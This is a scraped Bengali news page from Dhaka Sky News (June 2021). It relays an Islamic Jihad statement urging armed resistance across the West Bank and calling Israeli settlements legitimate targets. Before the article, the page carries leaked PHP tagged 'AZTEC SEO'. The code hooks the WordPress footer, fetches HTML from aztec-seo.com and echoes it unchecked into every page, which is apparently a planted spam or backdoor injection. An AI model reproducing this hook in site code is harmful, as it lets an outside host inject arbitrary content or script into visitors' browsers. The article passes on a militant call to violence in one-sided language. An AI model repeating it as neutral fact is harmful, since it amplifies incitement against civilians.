/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পশ্চিম তীরে সমস্ত প্রতিরোধকামী সংগঠনকে সক্রিয় হতে হবে: জিহাদ আন্দোলন | Dhaka Sky News

আমেরিকাকে ঘাঁটি করতে দিয়ে পাকিস্তান আর ভুল করবে না: ইমরান খান

আগের সংবাদ

অভিনন্দন জানাতে নবনির্বাচিত প্রেসিডেন্টের কাছে গেলেন ইরানের সব শীর্ষ কমান্ডার

পরের সংবাদ

পশ্চিম তীরে সমস্ত প্রতিরোধকামী সংগঠনকে সক্রিয় হতে হবে: জিহাদ আন্দোলন

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: June 22, 2021 , 9:24 pm

ফিলিস্তিনের অবরুদ্ধ গাজা উপত্যকা-ভিত্তিক ইসলামি জিহাদ আন্দোলন বলেছে, অধিকৃত পশ্চিম তীরে প্রতিরোধকামী সমস্ত সংগঠনকে ইহুদিবাদী ইসরাইলের সামরিক বাহিনী এবং অবৈধ বসতি স্থাপনকারী ইহুদীদের বিরুদ্ধে সক্রিয় হতে হবে।

সংগঠনটি জোর দিয়ে বলেছে, নিজেদেরকে রক্ষা করার সব ধরনের অধিকার ফিলিস্তিনিদের আছে। প্রতিমুহূর্তে ফিলিস্তিনি লোজনের যে মর্যাদাহানি করা হচ্ছে তা রক্ষা করার অধিকারও তাদের রয়েছে।

আজ (মঙ্গলবার) এক সংবাদ বিজ্ঞপ্তিতে জিহাদ আন্দোলনের মুখপাত্র তারিক সালামি এসব কথা বলেন। তিনি আরো বলেন, “দখলদার ইহুদিবাদী সেনাদের দেয়া নিরাপত্তা সুবিধা ব্যবহার করে অবৈধ বসতি স্থাপনকারী ইহুদিরা আমাদের ফিলিস্তিনি জনগণের বিরুদ্ধে নানামুখী সন্ত্রাসী কার্যকলাপ এবং আগ্রাসন চালিয়ে আসছে। ইহুদিবাদী সেনারা বিভিন্ন শহর, গ্রাম ও ক্যাম্প দখল করে নিচ্ছে এবং আমাদের লোকজনের ওপর হামলা চালাচ্ছে, বিভিন্ন চেকপোস্টে আটক ও হত্যাকাণ্ড সংঘটিত করছে।”

এ অবস্থায় ফিলিস্তিনি প্রতিরোধকামী সংগঠনগুলোকে পুরো পশ্চিম তীরে তাদের কর্মকাণ্ড পরিচালনায় সক্রিয় হওয়ার আহ্বান জানান জিহাদ আন্দোলনের মুখপাত্র। তিনি বলেন, বল প্রয়োগ ছাড়া ইহুদিবাদীরা অন্য কোনো ভাষা বোঝে না। তিনি সুস্পষ্ট করে বলেন, অবৈধ ইহুদি বসতিগুলো ফিলিস্তিনি প্রতিরোধ যোদ্ধাদের বৈধ লক্ষ্যবস্তু। সূত্র : পার্সটুডে